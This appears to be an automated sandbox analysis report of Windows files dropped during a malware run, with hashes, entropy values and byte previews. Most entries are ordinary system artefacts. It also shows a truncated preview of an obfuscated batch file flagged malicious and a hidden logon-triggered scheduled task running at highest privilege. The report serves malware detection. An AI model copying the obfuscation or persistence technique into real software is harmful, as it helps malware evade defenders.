SSDEEP:	6144:wZq58Rtx0E6JZ3R0FqoRy9grd5y+jLnKoOtZoSqOpo3Qqn/:5NPR0Fq8Aod5y+jTY0SqacQq/
MD5:	56EE3F9EC63B143C58854E33EE043CD2
SHA1:	41815B5B4389BA871DFAA7C029C2E80FB62667F3
SHA-256:	2B2D66AC33D54FA7CC5D408EE64BBD43350729EA1F13B3F7C1B9CCB4CE80257F
SHA-512:	C30CA76BACFB51C5DE55B8C8240231D0EF51A88AA7BDBAA89745CA1CD2A085A2FF06AFCDABE8D3CE14D4D3D10A121483CA0EECBA00B8458E41972D053F3B92C1
Malicious:	false
Preview:	MDMP..a..... .........f............T............'..h........4...3..........\|...........`.......8...........T............^...............g...........i..............................................................................eJ......tj......Lw......................T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB52.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8584
Entropy (8bit):	3.6942176814285483
Encrypted:	false
SSDEEP:	192:R6l7wVeJ8aRv6YzrlgmfZaPKpWEL89bRIefH7m:R6lXJZZ6Y/lgmfQP/RZfS
MD5:	55E027AFCCCAA4E1165C7AA43BBF3359
SHA1:	36CB56452625D2377EC8C8A8CD7191ACE4151E74
SHA-256:	06D84E831BFDBA2B5D6E15B190027C6756066C9E351E9B075B619C1945F58EAC
SHA-512:	B8E0D1EE1CCF0A7EE9D204AAC27F620021FA04FAF1EC4BB183DD359DD6E387B2365AF34089BEF1ABD887083886FFA068A864CC830BB132AEE45BFEED0D76EDD8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA2.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.441389444143406
Encrypted:	false
SSDEEP:	48:cvIwWl8zseSJg771I9fMWpW8VYJYm8M4JQ9wSFCyq8vlwXytfFd:uIjfhI7El7V1JQGRWuXufFd
MD5:	B20E0BEA9BE8A572E0D33BD6E305C8C4
SHA1:	039DBEE5E482D342AE1F554EFC9C36A288CF2DFD
SHA-256:	1AFB53A1314FB267E9068718DAB923BD3C7B6B5765F94FBF506FE82ED1BBABAC
SHA-512:	AF6C3EA8070B56423CD6AE8ECF80181CC439ECB859BF900FBF2622AF8D1BA491472A6C5EBA0E129E04669769782954AB8BBF77673BB96D614A42F60B987613EE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527366" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2916
Entropy (8bit):	5.381082842927869
Encrypted:	false
SSDEEP:	48:44AzsSU4YymI4RIoUeCa+m9qr9t5/78NfpH4Gx3axIZVEouNHJBVrH/jCB:rAzlHYvIIfLz9qrh7KfpRjPEo2dL8
MD5:	F4BE5980A714908EBBA01125181DF32D
SHA1:	EA12BA3B091CB0F1035196820276A55A435A13E3
SHA-256:	2D90AFF66CF3D74DCD85194EE98C76597CE6649C7047FF8A94E02E1CA4C64233
SHA-512:	74336A0095EFDF698363BF3B859C112E96AC7322254B5CCE28C249D2903FF05048BA1E7493F69B1C29C6F0337D53EBAF7321ECBB5CC12A9006D3FFB66BF9EB53
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1riomnp1.nuz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fza54o2.50k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_de3gveca.2sd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnbrynbb.dzf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbbfu22a.mvk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vprrwa1p.ezw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-03

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	352
Entropy (8bit):	7.396909983796798
Encrypted:	false
SSDEEP:	6:TuRXpThPWQJlAAEjCAnWkM599qCRI9srr6iQnyEmppei1cjTipHibUkAVBn:TuRXpTJlAlCAnWvJRIqiiS9m6i1cjTqp
MD5:	0A49242CA7150F19F0BFC2F5337C5999
SHA1:	CF5BFD94D2E2609A6CE1F8B4ED4E70AC0385CAC3
SHA-256:	E531C82D09EF1E0581054E03888A36937E1C3D916E630011EFDC14B342FC3C2B
SHA-512:	484BCC7105BFE4794045F540ED12FDB40C32B44BBEF9477534A041FDAB6228276B5482E857892A7AAC422D97BD51F0CC73B85BC748B44A1C221333C223EC6C74
Malicious:	false
Preview:	MY...U:.1.............L.p.O.Y.s]//<k. ...i...v_.^.R....^}.Q.S..S)...9oh....3gG..2BO.(T'e..ql*.xA.p.@...I.HG@....%=Kj.l..+`c...$R..W..WSV...7..C..%....X..i......e9....5B.....{m.Yi.K......ufH..K...$0BU....J.0F,...c..e. ..r...U9..:...lX...k........;....[o...= $V..I(k....j...-f^...Y3.G.t..L4J...}...1./....?#".Z...b..r..E..uY...e....L...y.1.

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
Category:	dropped
Size (bytes):	5214429
Entropy (8bit):	6.008710946572079
Encrypted:	false
SSDEEP:	49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
MD5:	19FC666F7494D78A55D6B50A0252C214
SHA1:	8876CD520507CBFDC2E89E449BABA52232A1DF1B
SHA-256:	E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
SHA-512:	94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
Malicious:	true
Preview:	@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt

C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\Tasks\$rbx-9pdB1aHK

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	3.587684480817152
Encrypted:	false
SSDEEP:	48:yei1q97rQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCc0:tYnkp2Gdi3ipVA9ll7EhAMz3cHtr+
MD5:	5963A0A8B46820D708D44DFD2F7535A8
SHA1:	1475C521CACC23389C7AD3CCEDDFAE570BAA2F50
SHA-256:	889D9CB2BEA33BA5A786B6BFF31773A50D886477B365D29AADC09E74F60FF1A0
SHA-512:	3668FB1EC21C53F0B9A0236CF7FC9B8FB085E65447F58F53A112513DBEA3E9184C73728A529DF1791E9331C188FA4CBB14F5BA0790EDDACEBD00AFF0643C784E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.1.0.:.4.2.:.0.9...9.6.3.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.9.p.d.B.1.a.H.K.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67544
Entropy (8bit):	3.996029735699618
Encrypted:	false
SSDEEP:	768:mpfuflfofzwAbP5AAKP5qf5AKP5dfvoXfSPfm4fGfuszpfn8:wvbPNKPTKP3GbzF8
MD5:	F6B6DC892A6FADBDD0D457B3D2E18FE6
SHA1:	A99CB936472DB4D03F63C60EAE26C4CB35FBBDA4
SHA-256:	C1316854E3DAE56FE75CDB1CE50E2EF4E8B0EBD76BC92D2C44A980E9BFF276AF
SHA-512:	C36958A263C81622E435D63409D07AB96B281E387FFEF195A011786FD98461C36C69BA01DC485F62D07E50AF1CFEDAB05758FF2AF152F2DB8F861BF2AA5F65A6
Malicious:	false
Preview:	ElfChnk.................E.......M................"...]v......................................................................j..............................................=...........................................................................................................................g...............@...........................n...................M...]...........................p...............&...............................................................&.......................................**......L.....................d.)&.....................................................................................!...d............................L..............w.)Cp...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.a.a.b.7.f.3.6.c.3...1.6.8.0...0.1.d.b.1.5.9.f.c.f.3.2.0.4.d.8...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.9928051740316333
Encrypted:	false
SSDEEP:	768:FVUHiapX7xadptrDT9W84Gq4dGnMltZtgcrO:sHi6xadptrX9WP+g
MD5:	7941FD55905829E32067290DE281ADA9
SHA1:	F78C8A4F8D64155C258FB28E6F673CB2831A03C3
SHA-256:	ECD4A3DB4E85D7508FE8EF659C2175A0E40F521CCABFA985776C6771CC362411
SHA-512:	C7D345075F3A25FFA021E6E52F7B79EC22C9E61B64172F13733104C3B8488D87B5143ADE49A891E883F12C7ED0E55B8C2943B021C140B25A26F669B963184D38
Malicious:	false
Preview:	ElfChnk.........M...............M..........................................................................................`.~.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.396148699263237
Encrypted:	false
SSDEEP:	384:jhONk2SCNCrN0KNoBNoiNKNosaNjN4N9NRNCN8NoNjNUNONXN6N6LNvgN1NkNWzP:jgS5itAsZ2DCIEzVFNtPp
MD5:	1714E9F375BF402E9FF7644ED82EC285
SHA1:	ECB3A4495CEBE4F270C8D94553F027A36F50C42B
SHA-256:	20C6A11A8C455A4E4077CC61001BED7C0DD4E6F4FAADBCAD8DDF9A31406F1051
SHA-512:	A376B10C14E4EF653991874DE0D730768CC8D9BD49D8C348EED40CD184DA0C2AB47022B0AF6841B0F260598927C63271550A9B2C30F6A0DB1F6A3F830FC16576
Malicious:	false
Preview:	ElfChnk.v...............v...................p.......T..q......................................................................D&................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................}.......................}.......................&...M.......M...........................}...................m...................**......v........^.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.291472434779734
Encrypted:	false
SSDEEP:	384:dhpVAVqVjVWVscVcVtVrV51VgVTV/VZVXKVNVjVyVlF/vVIVtVQVwVEV+VpVIVYQ:db8xf4BsuMgkMu4Ht
MD5:	0D17D3FE0C679FE879B0135A8F665F86
SHA1:	2CC53BA3D81A3E640649F7BB609499DED7C76429
SHA-256:	A761DC30DD507B19E97BF45684432B8388C3662B30EACD1D85F7FDEA6D9700F9
SHA-512:	75D1EBC29F7589ECD0D19D02657D95BB7328FB3772D480ED269D3B130FB2400DFFCC68155CC34D996AA9BFD9ED46891AA0E18ABF08100CDB9150FF86C906A6CE
Malicious:	false
Preview:	ElfChnk.........A...............A..................to.....................................................................\.Y6................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F....................................................'..............&.......................................................................%......**..................`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4171477781140895
Encrypted:	false
SSDEEP:	384:4EhImkmAymRvmVkcmhTiYmBmgmUmWmBmbm4my7mcEZmZmtmZ4mRmKmdm5mqmmmW5:4ExkrTiZz+9hZ/97TSPnSKn
MD5:	019DF127D51AF46390648C77E49472B0
SHA1:	6EB98EDEB65C54F56450A0C9D16421FE47049E92
SHA-256:	1989B8954894614B6A075BFFD6A7970545DE3E02996349BBCBF5E8120499A5A9
SHA-512:	0635DE7DA2B17185E4EE0F9DD876BF61E3DBD0079BB8C499AA50E646626E40BB1EF213BA61FD84171F4825D063BE70F97548C9C46B699DAB0918B3505A067187
Malicious:	false
